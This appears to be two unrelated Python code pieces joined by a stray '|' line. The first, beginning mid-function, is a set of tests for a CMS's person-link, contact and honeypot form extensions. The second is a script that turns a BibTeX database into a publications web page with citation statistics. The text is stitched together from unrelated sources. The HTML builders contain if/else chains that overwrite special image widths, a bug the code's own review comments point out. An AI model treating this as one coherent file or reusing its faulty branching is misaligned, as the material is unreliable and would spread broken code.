        ('6d120102d90344868eb32614cf3acb1a', (None, False)),  # Troy _B_arnes
        ('f0281b558a5f43f6ac81589d79538a87', (None, False))  # Britta _P_erry
    ]
    form.people_aa37e9cc40ab402ea70b0d2b4d672de3.data = True
    form.update_model(topic)
    assert topic.content['people'] == [
        ('6d120102d90344868eb32614cf3acb1a', (None, False)),  # Troy _B_arnes
        ('aa37e9cc40ab402ea70b0d2b4d672de3', (None, False)),  # Annie _E_dison
        ('f0281b558a5f43f6ac81589d79538a87', (None, False))  # Britta _P_erry
    ]
    # once the order changes, people are added at the end
    topic.move_person(
        subject='f0281b558a5f43f6ac81589d79538a87',  # Britta
        target='6d120102d90344868eb32614cf3acb1a',  # Troy
        direction='above'
    )
    assert topic.content['people'] == [
        ('f0281b558a5f43f6ac81589d79538a87', (None, False)),  # Britta _P_erry
        ('6d120102d90344868eb32614cf3acb1a', (None, False)),  # Troy _B_arnes
        ('aa37e9cc40ab402ea70b0d2b4d672de3', (None, False)),  # Annie _E_dison
    ]
    topic.move_person(
        subject='6d120102d90344868eb32614cf3acb1a',  # Troy
        target='aa37e9cc40ab402ea70b0d2b4d672de3',  # Annie
        direction='below'
    )
    assert topic.content['people'] == [
        ('f0281b558a5f43f6ac81589d79538a87', (None, False)),  # Britta _P_erry
        ('aa37e9cc40ab402ea70b0d2b4d672de3', (None, False)),  # Annie _E_dison
        ('6d120102d90344868eb32614cf3acb1a', (None, False)),  # Troy _B_arnes
    ]
    form.people_adad98ff74e2497a9e1dfbba0a6bbe96.data = True
    form.update_model(topic)
    assert topic.content['people'] == [
        ('f0281b558a5f43f6ac81589d79538a87', (None, False)),  # Britta _P_erry
        ('aa37e9cc40ab402ea70b0d2b4d672de3', (None, False)),  # Annie _E_dison
        ('6d120102d90344868eb32614cf3acb1a', (None, False)),  # Troy _B_arnes
        ('adad98ff74e2497a9e1dfbba0a6bbe96', (None, False)),  # Abed _N_adir
    ]
def test_person_link_move_function():
    """Moving a person keeps their stored function text attached."""
    class Topic(PersonLinkExtension):
        content = {}
        def get_selectable_people(self, request):
            return [
                Bunch(
                    id=UUID('aa37e9cc-40ab-402e-a70b-0d2b4d672de3'),
                    title="Joe Biden"
                ),
                Bunch(
                    id=UUID('6d120102-d903-4486-8eb3-2614cf3acb1a'),
                    title="Barack Obama"
                ),
            ]
    class TopicForm(Form):
        pass
    topic = Topic()
    request = Bunch(**{
        'translate': lambda text: text,
        'app.settings.org.disabled_extensions': []
    })
    form_class = topic.with_content_extensions(TopicForm, request=request)
    form = form_class()
    form.people_6d120102d90344868eb32614cf3acb1a.data = True
    form.people_6d120102d90344868eb32614cf3acb1a_function.data = "President"
    form.people_aa37e9cc40ab402ea70b0d2b4d672de3.data = True
    form.people_aa37e9cc40ab402ea70b0d2b4d672de3_function.data = \
        "Vice-President"
    form.update_model(topic)
    assert topic.content['people'] == [
        ('aa37e9cc40ab402ea70b0d2b4d672de3', ("Vice-President", False)),
        ('6d120102d90344868eb32614cf3acb1a', ("President", False))
    ]
    # reorder: functions travel with their person
    topic.move_person(
        subject='6d120102d90344868eb32614cf3acb1a',
        target='aa37e9cc40ab402ea70b0d2b4d672de3',
        direction='above'
    )
    assert topic.content['people'] == [
        ('6d120102d90344868eb32614cf3acb1a', ("President", False)),
        ('aa37e9cc40ab402ea70b0d2b4d672de3', ("Vice-President", False)),
    ]
def test_contact_extension():
    """The contact text round-trips and renders to linked HTML."""
    class Topic(ContactExtension):
        content = {}
    class TopicForm(Form):
        pass
    topic = Topic()
    assert topic.contact is None
    assert topic.contact_html is None
    request = Bunch(**{'app.settings.org.disabled_extensions': []})
    form_class = topic.with_content_extensions(TopicForm, request=request)
    form = form_class()
    assert 'contact' in form._fields
    form.contact.data = (
        "Steve Jobs\n"
        "steve@apple.com\n"
        "https://www.apple.com"
    )
    form.populate_obj(topic)
    assert topic.contact == (
        "Steve Jobs\n"
        "steve@apple.com\n"
        "https://www.apple.com"
    )
    # e-mail and URL are auto-linked in the HTML rendering
    assert topic.contact_html == (
        '<p><span class="title">'
        'Steve Jobs</span></p>'
        '<p><a href="mailto:steve@apple.com">steve@apple.com</a><br>'
        '<a href="https://www.apple.com" rel="nofollow">'
        'https://www.apple.com</a>'
        '</p>'
    )
    form_class = topic.with_content_extensions(TopicForm, request=request)
    form = form_class()
    form.process(obj=topic)
    assert form.contact.data == (
        "Steve Jobs\n"
        "steve@apple.com\n"
        "https://www.apple.com"
    )
def test_contact_extension_with_top_level_domain_agency():
    """Long TLDs (.agency) must not be truncated when auto-linking e-mails."""
    class Topic(ContactExtension):
        content = {}
    class TopicForm(Form):
        pass
    topic = Topic()
    assert topic.contact is None
    assert topic.contact_html is None
    request = Bunch(**{'app.settings.org.disabled_extensions': []})
    form_class = topic.with_content_extensions(TopicForm, request=request)
    form = form_class()
    assert 'contact' in form._fields
    form.contact.data = (
        "longdomain GmbH\n"
        "hello@website.agency\n"
        "https://custom.longdomain"
    )
    form.populate_obj(topic)
    assert topic.contact == (
        "longdomain GmbH\n"
        "hello@website.agency\n"
        "https://custom.longdomain"
    )
    # regression: the address must not be cut down to the '.ag' TLD
    d = topic.contact_html
    assert '<a href="mailto:hello@website.ag"' not in d
def test_honeypot_extension():
    """The honeypot toggle controls injection of the hidden lure field."""
    class Submission(Extendable, HoneyPotExtension):
        meta = {}
    class EditSubmissionForm(Form):
        pass
    class SubmissionForm(Form):
        pass
    # Edit submission
    # ... default
    submission = Submission()
    assert submission.honeypot is True
    request = Bunch(**{'app.settings.org.disabled_extensions': []})
    form_class = submission.with_content_extensions(
        EditSubmissionForm, request=request
    )
    form = form_class()
    assert 'honeypot' in form._fields
    assert form.honeypot.data is True
    # ... change
    form.honeypot.data = False
    form.populate_obj(submission)
    assert submission.honeypot is False
    # ... apply
    form_class = submission.with_content_extensions(
        EditSubmissionForm, request=request
    )
    form = form_class()
    form.process(obj=submission)
    assert form.honeypot.data is False
    # Extend submission
    # ... add: honeypot on -> the lure field 'duplicate_of' is present
    submission.honeypot = True
    form_class = submission.extend_form_class(
        SubmissionForm, extensions=['honeypot']
    )
    form = form_class()
    form.model = submission
    form.on_request()
    assert 'duplicate_of' in form._fields
    # ... don't add
    submission.honeypot = False
    form = form_class()
    form.model = submission
    form.on_request()
    assert 'duplicate_of' not in form._fields
|
###
# Script for updating the https://ircre.org/research.html page.
# It regenerates research.html in our house format from ircre.bib.
#
###
import os
import shutil
import sys
from datetime import datetime

import bibtexparser
from bibtexparser.bibdatabase import BibDatabase
from bibtexparser.bparser import BibTexParser
from bibtexparser.bwriter import BibTexWriter
# All data/output paths are resolved relative to this script's directory so
# the script works regardless of the current working directory.
currentdir = os.path.dirname(os.path.abspath(__file__))
ircre_bib_path = currentdir+r'/../bib7image/ircre.bib'  # master BibTeX database (input)
articles_bib_path = currentdir+r'/../bib7image/articles.bib'  # journal articles only
others_bib_path = currentdir+r'/../bib7image/others.bib'  # books / proceedings / editorials
sorted_articles_bib_path = currentdir+r'/../bib7image/sorted-articles.bib'  # articles sorted by IF/citations
top15_bib_path = currentdir+r'/../bib7image/top15.bib'  # 15 most cited articles
newircre_bib_path = currentdir+r'/../bib7image/newircre.bib'  # merged output database
researchnew_html_path = currentdir+r'/../webpage/researchnew.html'  # generated HTML page
def bibtexclassify():
    """Split the master ircre.bib into articles.bib and others.bib.

    Journal articles ('article' entries) go to articles.bib; books,
    proceedings and editorial collections ('inbook' / 'inproceedings' /
    'incollection') go to others.bib. Returns 0 on success.
    """
    parser = BibTexParser(common_strings=False)
    # Keep non-standard entry types (e.g. the custom 'toparticle' type).
    parser.ignore_nonstandard_types = False
    with open(ircre_bib_path, encoding='utf8') as bibtexfile:
        ircrebib_database = bibtexparser.load(bibtexfile, parser)
    allentries = ircrebib_database.entries.copy()
    # Journal articles -> articles.bib.
    article_entries = [entry.copy() for entry in allentries
                       if entry['ENTRYTYPE'] == 'article']
    article_database = BibDatabase()
    article_database.entries = article_entries
    writer = BibTexWriter()
    writer.indent = ' '
    writer.order_entries_by = ('order',)
    with open(articles_bib_path, 'w', encoding='utf8') as article_file:
        bibtexparser.dump(article_database, article_file, writer=writer)
    # Everything that is a book chapter, proceeding or collection -> others.bib.
    otherentries = [entry.copy() for entry in allentries
                    if entry['ENTRYTYPE'] in ('inbook', 'inproceedings', 'incollection')]
    other_database = BibDatabase()
    other_database.entries = otherentries
    writer2 = BibTexWriter()
    writer2.indent = ' '
    writer2.order_entries_by = ('order',)
    with open(others_bib_path, 'w', encoding='utf8') as others_file:
        bibtexparser.dump(other_database, others_file, writer=writer2)
    return 0
def articlessort():
    """Sort articles.bib and write the result to sorted-articles.bib.

    Sort order is descending by (impact factor, journal name, citation
    count, year); the 'order' field is renumbered to match. Entries with
    a missing or malformed numeric field sort as 0. Returns 0 on success.
    """
    parser = BibTexParser(common_strings=False)
    parser.ignore_nonstandard_types = False
    with open(articles_bib_path, encoding='utf8') as articlesfile:
        articles_database = bibtexparser.load(articlesfile, parser)
    articles = articles_database.entries.copy()
    # Attach temporary numeric sort keys (field values are strings in bib files).
    for entry in articles:
        try:
            entry['sortkey1'] = float(entry['impactfactor'])
        except (KeyError, ValueError):
            entry['sortkey1'] = 0.0
        try:
            entry['sortkey2'] = int(entry['cited'])
        except (KeyError, ValueError):
            entry['sortkey2'] = 0
    sorted_by_journalif_cited = sorted(articles, key=lambda x: (
        x['sortkey1'], x['journal'], x['sortkey2'], x['year']), reverse=True)
    # Renumber 'order' (zero-padded so lexicographic == numeric order)
    # and drop the temporary keys before writing.
    for position, entry in enumerate(sorted_by_journalif_cited):
        entry['order'] = str(position).zfill(6)
        entry.pop('sortkey1')
        entry.pop('sortkey2')
    sortedarticlesdatabase = BibDatabase()
    sortedarticlesdatabase.entries = sorted_by_journalif_cited
    writer = BibTexWriter()
    writer.indent = ' '
    writer.order_entries_by = ('order',)
    with open(sorted_articles_bib_path, 'w', encoding='utf8') as sortedarticlesfile:
        bibtexparser.dump(sortedarticlesdatabase,
                          sortedarticlesfile, writer=writer)
    return 0
def getop15articles():
    """Extract the (up to) 15 most cited articles into top15.bib.

    The copies get ENTRYTYPE 'toparticle' and an 'a'-suffixed ID so they
    can coexist with the originals in the merged database. Databases with
    fewer than 15 articles no longer raise IndexError. Returns 0.
    """
    parser = BibTexParser(common_strings=False)
    parser.ignore_nonstandard_types = False
    with open(articles_bib_path, encoding='utf8') as article_file:
        article_database = bibtexparser.load(article_file, parser)
    article_entries = article_database.entries.copy()
    # Numeric citation key; missing/malformed 'cited' counts as 0.
    for entry in article_entries:
        try:
            entry['sortkey1'] = int(entry['cited'])
        except (KeyError, ValueError):
            entry['sortkey1'] = 0
    articles_sorted_by_cited = sorted(
        article_entries, key=lambda x: x['sortkey1'], reverse=True)
    # Slice is safe even when fewer than 15 articles exist.
    top15articles = [entry.copy() for entry in articles_sorted_by_cited[:15]]
    for entry in top15articles:
        entry['ENTRYTYPE'] = 'toparticle'
        entry['ID'] = entry['ID'] + 'a'
        entry.pop('sortkey1')
    top15_database = BibDatabase()
    top15_database.entries = top15articles
    writer = BibTexWriter()
    writer.indent = ' '
    writer.order_entries_by = None
    with open(top15_bib_path, 'w', encoding='utf8') as top15_file:
        bibtexparser.dump(top15_database, top15_file, writer=writer)
    return 0
def ircrebibmerge():
    """Merge top15.bib, sorted-articles.bib and others.bib into newircre.bib.

    Output order: top-15 copies first, then all sorted articles, then
    the other publication types. Returns 0 on success.
    """
    articlesparser = BibTexParser(common_strings=False)
    articlesparser.ignore_nonstandard_types = False
    with open(sorted_articles_bib_path, encoding='utf8') as sortedarticle_file:
        sortedarticle_database = bibtexparser.load(
            sortedarticle_file, articlesparser)
    sortedarticles = sortedarticle_database.entries.copy()
    top15parser = BibTexParser(common_strings=False)
    top15parser.ignore_nonstandard_types = False
    with open(top15_bib_path, encoding='utf8') as top15_file:
        top15_database = bibtexparser.load(top15_file, top15parser)
    top15articles = top15_database.entries.copy()
    othersparser = BibTexParser(common_strings=False)
    othersparser.ignore_nonstandard_types = False
    with open(others_bib_path, encoding='utf8') as others_file:
        others_database = bibtexparser.load(others_file, othersparser)
    others = others_database.entries.copy()
    alldb = BibDatabase()
    # Concatenate the three sections in display order.
    alldb.entries = [entry.copy()
                     for entry in top15articles + sortedarticles + others]
    writer = BibTexWriter()
    writer.indent = ' '
    writer.order_entries_by = None
    with open(newircre_bib_path, 'w', encoding='utf8') as newircrebibfile:
        bibtexparser.dump(alldb, newircrebibfile, writer=writer)
    return 0
def Hindex(citationlist):
    """Return the h-index for *citationlist* (per-paper citation counts).

    The h-index is the largest h such that at least h papers have at
    least h citations each. Fixes two defects of the previous version:
    an empty list raised UnboundLocalError (now returns 0), and only
    distinct citation values were considered as candidate h, which could
    overestimate (e.g. [4, 4, 4] returned 4 instead of 3).
    """
    h = 0
    # Walk papers from most to least cited; rank r is h-feasible while
    # the r-th paper still has >= r citations.
    for rank, cites in enumerate(sorted(citationlist, reverse=True), start=1):
        if cites >= rank:
            h = rank
        else:
            break
    return h
def I10index(citationlist):
    """Return the i10-index for *citationlist* (per-paper citation counts).

    The i10-index is simply the number of papers cited at least 10 times.
    """
    return sum(1 for cited in citationlist if cited >= 10)
def filecopyback():
    """Deploy the regenerated bib and statistics files to the live website.

    Copies (overwriting) newircre.bib and newstatistics.js from the
    working directory into the web server's js/ directory. Uses
    shutil.copyfile instead of the former `os.system('cd ...; cp ... -f')`
    shell calls: same overwrite semantics, no shell involved, and errors
    raise instead of being silently ignored. Returns 0 on success.
    """
    ircrebibwebsitefile = '/srv/main-websites/ircre/js/ircre.bib'
    ircrestatwebsitefile = '/srv/main-websites/ircre/js/statistics.js'
    workdir = '/home/limingtao/ircre-bibtex/ircreupdate'
    shutil.copyfile(workdir + '/newircre.bib', ircrebibwebsitefile)
    shutil.copyfile(workdir + '/newstatistics.js', ircrestatwebsitefile)
    return 0
def getstatistics():
    """Compute summary statistics over the articles in articles.bib.

    Returns the tuple (totalarticles, totalcitations, hindex, i10index,
    citationperpaper, journalnumber, averageif, hihonumber), where
    hihonumber counts ESI highly-cited articles (entries carrying a
    'hihosubject' field). Per-paper averages are rounded for display and
    fall back to 0.0 for an empty database instead of dividing by zero.
    """
    articlesparser = BibTexParser(common_strings=False)
    articlesparser.ignore_nonstandard_types = False
    with open(articles_bib_path, encoding='utf8') as articlesfile:
        articles_database = bibtexparser.load(articlesfile, articlesparser)
    articleentries = articles_database.entries
    totalcitations = 0
    totalif = 0.0
    citationlist = []
    journallist = []
    hihonumber = 0
    totalarticles = len(articleentries)
    # (The previous version also computed totalpublications = len + 28,
    # but never used or returned it.)
    for entry in articleentries:
        citednumber = int(entry.get('cited', 0))
        impactfactor = float(entry.get('impactfactor', 0.0))
        if 'hihosubject' in entry:
            hihonumber += 1
        citationlist.append(citednumber)
        journallist.append(entry['journal'])
        totalcitations += citednumber
        totalif += impactfactor
    hindex = Hindex(citationlist)
    i10index = I10index(citationlist)
    citationperpaper = round(totalcitations / totalarticles, 2) if totalarticles else 0.0
    journalnumber = len(set(journallist))
    averageif = round(totalif / totalarticles, 3) if totalarticles else 0.0
    return (totalarticles, totalcitations, hindex, i10index,
            citationperpaper, journalnumber, averageif, hihonumber)
def getsothers():
    """Compute summary statistics over others.bib.

    Returns (totalbooks, totalcitations, totalproceeds, totaleditors):
    the counts of 'inbook', 'inproceedings' and 'incollection' entries
    plus their combined citation count.
    """
    othersparser = BibTexParser(common_strings=False)
    othersparser.ignore_nonstandard_types = False
    with open(others_bib_path, encoding='utf8') as othersfile:
        others_database = bibtexparser.load(othersfile, othersparser)
    othersentries = others_database.entries
    typecounts = {'inbook': 0, 'inproceedings': 0, 'incollection': 0}
    totalcitations = 0
    for entry in othersentries:
        entrytype = entry['ENTRYTYPE']
        if entrytype in typecounts:
            typecounts[entrytype] += 1
        # Missing/absent 'cited' counts as zero citations.
        totalcitations += int(entry.get('cited', 0))
    return (typecounts['inbook'], totalcitations,
            typecounts['inproceedings'], typecounts['incollection'])
def generateTop15ArtitleHtml(bibFilePath):
    """Build the 'Top 15 Most Cited Articles' section and return it as HTML.

    Reads the merged bib file at *bibFilePath* and renders every entry
    whose ENTRYTYPE is 'toparticle' as one <li>, preceded by the
    site-wide publication/citation counters.
    """
    parser = BibTexParser(common_strings=False)
    # Keep non-standard entry types: the top-15 copies use 'toparticle'.
    parser.ignore_nonstandard_types = False
    with open(bibFilePath, encoding='utf8') as bibtexFile:
        ircreDatabase = bibtexparser.load(bibtexFile, parser)
    allEntries = ircreDatabase.entries.copy()
    # Aggregate statistics feed the header counters.
    (totalarticles, articaltotalcitations, hindex, i10index,
     citationperpaper, journalnumber, averageif, hihonumber) = getstatistics()
    (totalbooks, othertotalcitations, totalproceeds, totaleditors) = getsothers()
    allnumber = totalarticles+totalbooks+totalproceeds+totaleditors
    allcitations = articaltotalcitations+othertotalcitations
    # Initial value is the section header (totals + "Top 15" title).
    Top15Article = '''
    <div id="output">
        <div id="total-statistics">
            <h2>IRCRE Scientific Output</h2>
            <h3><span class="listcountred"><span id="totalpublications">'''+str(allnumber)+'''</span>+</span><strong>Publications
                    & </strong><span class="listcountblue"><span id="totalcitations">'''+str(allcitations)+'''</span>+</span> <strong>Citations since
                    2011</strong>
            </h3>
        </div>
        <div id="top15mostcitedarticles">
        <h3>
            <strong>Top 15 Most Cited Articles</strong>
        </h3></div>
    '''
    top15ArticleBody = ''
    for i in range(len(allEntries)):
        # Per-entry HTML fragments; fields absent from the entry render as ''.
        tempHtml = ''
        hiho = ''
        image = ''
        formattedAuthor = ''
        formattedtTitle = ''
        journal = ''
        year = ''
        volume = ''
        number = ''
        pages = ''
        paperid = ''
        url = ''
        impactFactor = ''
        cited = ''
        if allEntries[i]['ENTRYTYPE'] == 'toparticle':
            # The 'hihoimage' field itself is not rendered; entries that have
            # it get a fixed ESI "Highly Cited" badge linking to hiholink.
            if 'hihoimage' in allEntries[i].keys():
                hiho = '''
            <div style="float:inherit; height:40px; width:500px;text-align: left;"><img
                    src="./images/articlecovers/ISIHighlycitedlogo.jpg" alt="" width="77" height="31">
                <a class="newlink" a href="./%s"
                    target="_blank"><strong><em> %s</em></strong></a></div>
                ''' % (allEntries[i]['hiholink'], allEntries[i]['hihosubject'])
            if 'image' in allEntries[i].keys():
                image = '''<span style="float: left; width: 48px; height: 54px;"><img src="./images/articlecovers/%s" alt="" width="42" height="51"></span> ''' % (
                    allEntries[i]['image'])
            if 'formattedauthor' in allEntries[i].keys():
                formattedAuthor = allEntries[i]['formattedauthor']
            if 'formattedtitle' in allEntries[i].keys():
                formattedtTitle = ',“<strong>%s</strong> ”' % allEntries[i]['formattedtitle']
            if 'journal' in allEntries[i].keys():
                journal = ', <em>%s</em> ' % (
                    allEntries[i]['journal'])
            if 'year' in allEntries[i].keys():
                year = '<strong>%s</strong>,' % allEntries[i]['year']
            # volume(number) when both exist, otherwise whichever is present.
            if 'volume' in allEntries[i].keys():
                if 'number' in allEntries[i].keys():
                    volume = '<em>%s(%s)</em>' % (
                        allEntries[i]['volume'], allEntries[i]['number'])
                else:
                    volume = '<em>%s</em>' % (allEntries[i]['volume'])
            elif 'number' in allEntries[i].keys():
                number = '<em>%s</em>' % (allEntries[i]['number'])
            if 'pages' in allEntries[i].keys():
                pages = ',' + allEntries[i]['pages']
            # A citation count of '0' is still emitted but hidden via display:none.
            if 'cited' in allEntries[i].keys():
                if allEntries[i]['cited'] != '0':
                    cited = '<br><span class="cited"> Cited: %s</span>' % allEntries[i]['cited']
                else:
                    cited = '<br><span class="cited" style="display:none"> Cited: %s</span>' % allEntries[i]['cited']
            # Default to the "IF 2019" label unless an explicit IF year is given.
            if 'impactfactor' in allEntries[i].keys():
                if 'impactfactoryear' not in allEntries[i].keys():
                    impactFactor = '<span class="infact">(<strong>IF 2019: %s</strong>)</span><br>' % allEntries[i]['impactfactor']
                else:
                    impactFactor = '<span class="infact">(<strong>IF %s %s</strong>)</span><br>' % (allEntries[i]['impactfactoryear'],allEntries[i]['impactfactor'])
            if 'url' in allEntries[i].keys():
                url = '''<a href="%s" target="_blank">%s</a>''' % (
                    allEntries[i]['url'], allEntries[i]['url'])
            # Assemble the fragments into one list item.
            tempHtml = hiho + image + formattedAuthor + formattedtTitle + \
                journal + year + volume + number + pages + cited + impactFactor + url
            tempHtml = '<li style="padding:5px 0px">' + tempHtml + '</li>'
            top15ArticleBody = top15ArticleBody + tempHtml
    top15ArticleBody = '<ol>%s</ol>' % top15ArticleBody
    Top15Article = Top15Article + top15ArticleBody
    return Top15Article
def generateAricleHtml(bibFilePath):
    """Build the 'Articles' section of the page and return it as HTML.

    Renders every 'article' entry of *bibFilePath* as one <li>, preceded
    by the article statistics header (h-index, i10-index, averages, ...).
    """
    parser = BibTexParser(common_strings=False)
    parser.ignore_nonstandard_types = False
    with open(bibFilePath, encoding='utf8') as bibtexFile:
        ircreDatabase = bibtexparser.load(bibtexFile, parser)
    allEntries = ircreDatabase.entries.copy()
    (totalarticles, articaltotalcitations, hindex, i10index,
     citationperpaper, journalnumber, averageif, hihonumber) = getstatistics()
    # Initial value is the section header: overall article statistics
    # plus the section title.
    article = '''
    <div id="articlestatics" style="margin-top:20px;margin-bottom:20px;">
        <h3 class="title">
            <strong><a id="articles"></a>Articles</a></strong>
            <span class="listcountred">(<span id="totalarticles">'''+str(totalarticles)+'''</span>)</span>
        </h3>
        <div>
            <span class="index">h-index = </span><span class="index_number"><span
                    id="hindex">'''+str(hindex)+'''</span></span><span class="index">, i10-index = </span><span
                class="index_number"><span id="i10index">'''+str(i10index)+'''</span></span><span class="index">,
                Citations/Paper = </span><span class="index_number"><span
                    id="citationperpaper">'''+str(citationperpaper)+'''</span></span><span class="index">, Journals =
            </span><span class="index_number"><span id="numberjournals">'''+str(journalnumber)+'''</span></span><span
                class="index">, Average IF = </span><span class="index_number"><span
                    id="averageif">'''+str(averageif)+'''</span></span><span class="index">, ESI Highly Cited =
            </span><span class="index_number"><span id="numberesihighlycited">'''+str(hihonumber)+'''</span></span>
            <br>
            <span class="sorted">sorted by Impact Factor (2018 Journal Citation Reports®,
                Clarivate Analytics), citations from Google Scholar, CrossRef, SciFinder,
                Scopus...</span><br>
        </div>
    </div>'''
    articleBody = ''
    for i in range(len(allEntries)):
        # Per-entry HTML fragments; fields absent from the entry render as ''.
        tempHtml = ''
        hiho = ''
        image = ''
        formattedAuthor = ''
        formattedtTitle = ''
        journal = ''
        year = ''
        volume = ''
        number = ''
        pages = ''
        paperid = ''
        url = ''
        impactFactor = ''
        cited = ''
        if allEntries[i]['ENTRYTYPE'] == 'article':
            # Entries flagged as ESI highly cited get the badge + link.
            if 'hihoimage' in allEntries[i].keys():
                hiho = '''
            <div style=" height:40px; width:500px;text-align: left;"><img
                    src="./images/articlecovers/ISIHighlycitedlogo.jpg" alt="" width="77" height="31">
                <a class="hiholinka" a href="./%s"
                    target="_blank"><strong><em> %s</em></strong></a></div>
                ''' % (allEntries[i]['hiholink'], allEntries[i]['hihosubject'])
            # NOTE(review): when 'image' is present but 'imagewidth' is
            # missing, no branch below runs and image stays '' — confirm
            # whether a default cover was intended in that case.
            if 'image' in allEntries[i].keys():
                if 'imagewidth' in allEntries[i].keys():
                    imagewidth = allEntries[i]['imagewidth']
                    # NOTE(review): these are independent `if` statements,
                    # not an elif chain; the final `else` pairs only with
                    # the 'EcoMat' test, so any other special width is
                    # assigned and then overwritten by the default 48px
                    # image below. Looks like a bug — confirm before
                    # relying on the special-width branches.
                    if imagewidth == 'Beilstein Journal of Nanotechnology':
                        image = '''<span style="float: left; width: 190px;"><img class="bibtexVar" src="./images/articlecovers/%s" alt="" width="184" height="22" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    if imagewidth == 'Nature Communications':
                        image = '''<span style="float: left; width: 108px;"><img class="bibtexVar" src="./images/articlecovers/%s" alt="" width="102" height="32" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    if imagewidth == 'Physical Review B':
                        image = '''<span style="float: left; width: 102px;"><img class="bibtexVar" src="./images/articlecovers/%s" alt="" width="96" height="32" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    if imagewidth == 'Scientific Reports':
                        image = '''<span style="float: left; width: 165px;"><img class="bibtexVar" src="./images/articlecovers/%s" alt="" width="160" height="32" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    if imagewidth == 'EcoMat':
                        image = '''<span style="float: left; width: 155px;"><img class="bibtexVar" src="./images/articlecovers/%s" alt="" width="148" height="28" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    else:
                        image = '''<span style="float: left; width: 48px;"><img class="bibtexVar" src="./images/articlecovers/%s" alt="" width="42" height="51" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
            if 'formattedauthor' in allEntries[i].keys():
                formattedAuthor = allEntries[i]['formattedauthor']
            if 'formattedtitle' in allEntries[i].keys():
                formattedtTitle = ',“<strong>%s</strong> ”' % allEntries[i]['formattedtitle']
            if 'journal' in allEntries[i].keys():
                journal = ', <em>%s</em> ' % (
                    allEntries[i]['journal'])
            if 'year' in allEntries[i].keys():
                year = '<strong>%s</strong>,' % allEntries[i]['year']
            # volume(number) when both exist, otherwise whichever is present.
            if 'volume' in allEntries[i].keys():
                if 'number' in allEntries[i].keys():
                    volume = '<em>%s(%s)</em>' % (
                        allEntries[i]['volume'], allEntries[i]['number'])
                else:
                    volume = '<em>%s</em>' % (allEntries[i]['volume'])
            elif 'number' in allEntries[i].keys():
                number = '<em>%s</em>' % (allEntries[i]['number'])
            if 'pages' in allEntries[i].keys():
                pages = ','+allEntries[i]['pages']
            # A citation count of '0' is still emitted but hidden via display:none.
            if 'cited' in allEntries[i].keys():
                if allEntries[i]['cited'] != '0':
                    cited = '<br><span class="cited"> Cited: %s</span>' % allEntries[i]['cited']
                else:
                    cited = '<br><span class="cited" style="display:none"> Cited: %s</span>' % allEntries[i]['cited']
            # Default to the "IF 2019" label unless an explicit IF year is given.
            if 'impactfactor' in allEntries[i].keys():
                if 'impactfactoryear' not in allEntries[i].keys():
                    impactFactor = '<span class="infact">(<strong>IF 2019: %s</strong>)</span><br>' % allEntries[i]['impactfactor']
                else:
                    impactFactor = '<span class="infact">(<strong>IF %s %s</strong>)</span><br>' % (allEntries[i]['impactfactoryear'],allEntries[i]['impactfactor'])
            if 'url' in allEntries[i].keys():
                url = '''<a href="%s" target="_blank" style="float: left">%s</a>''' % (
                    allEntries[i]['url'], allEntries[i]['url'])
            # Assemble the fragments into one list item.
            tempHtml = hiho + image + formattedAuthor + formattedtTitle + \
                journal + year + volume + number + pages + cited + impactFactor + url
            tempHtml = '<li style="float: left;padding:5px 0px">' + tempHtml + '</li>'
            articleBody = articleBody + tempHtml
    articleBody = '<ol style="margin-top: 0px;padding-top:0px">%s</ol>' % articleBody
    article = article + articleBody
    return article
def generateBookHtml(bibFilePath):
    """Build the 'Book Chapters' section of the page and return it as HTML.

    Renders every 'inbook' entry of *bibFilePath* as one <li>; the <ol>
    numbering continues after the article list.
    """
    parser = BibTexParser(common_strings=False)
    parser.ignore_nonstandard_types = False
    with open(bibFilePath, encoding='utf8') as bibtexFile:
        ircreDatabase = bibtexparser.load(bibtexFile, parser)
    allEntries = ircreDatabase.entries.copy()
    (totalbooks, othertotalcitations, totalproceeds, totaleditors) = getsothers()
    # Initial value is the section header with the chapter count.
    book = '''
    <div id="bookchapters" style="margin-top:20px;margin-bottom:20px;">
        <h3 class="title">
            <strong><a id="articles"></a>Book Chapters</a></strong>
            <span class="listcountred">(<span id="totalarticles">'''+str(totalbooks)+'''</span>)</span>
        </h3>
    </div>'''
    bookBody = ''
    for i in range(len(allEntries)):
        # Per-entry HTML fragments; fields absent from the entry render as ''.
        tempHtml = ''
        hiho = ''
        image = ''
        formattedAuthor = ''
        formattedtTitle = ''
        journal = ''
        year = ''
        volume = ''
        number = ''
        pages = ''
        paperid = ''
        url = ''
        impactFactor = ''
        cited = ''
        if allEntries[i]['ENTRYTYPE'] == 'inbook':
            # Entries flagged as ESI highly cited get the badge + link.
            if 'hihoimage' in allEntries[i].keys():
                hiho = '''
            <div style=" height:40px; width:500px;text-align: left;"><img
                    src="./images/articlecovers/ISIHighlycitedlogo.jpg" alt="" width="77" height="31">
                <a class="hiholinka" a href="./%s"
                    target="_blank"><strong><em> %s</em></strong></a></div>
                ''' % (allEntries[i]['hiholink'], allEntries[i]['hihosubject'])
            if 'image' in allEntries[i].keys():
                if 'imagewidth' in allEntries[i].keys():
                    imagewidth = allEntries[i]['imagewidth']
                    # NOTE(review): independent `if`s, not an elif chain;
                    # the `else` pairs only with the 'Scientific Reports'
                    # test, so other special widths get overwritten by the
                    # default 48px image below — confirm intent.
                    if imagewidth == 'Beilstein Journal of Nanotechnology':
                        image = '''<span style="float: left; width: 190px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="184" height="22" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    if imagewidth == 'Nature Communications':
                        image = '''<span style="float: left; width: 108px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="102" height="32" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    if imagewidth == 'Physical Review B':
                        image = '''<span style="float: left; width: 102px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="96" height="32" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    if imagewidth == 'Scientific Reports':
                        image = '''<span style="float: left; width: 165px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="160" height="32" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
                    else:
                        image = '''<span style="float: left; width: 48px;"><img class="bibtexVar" src="./images/otherpublications/%s" alt="" width="42" height="51" text-align="left"></span> ''' % (
                            allEntries[i]['image'])
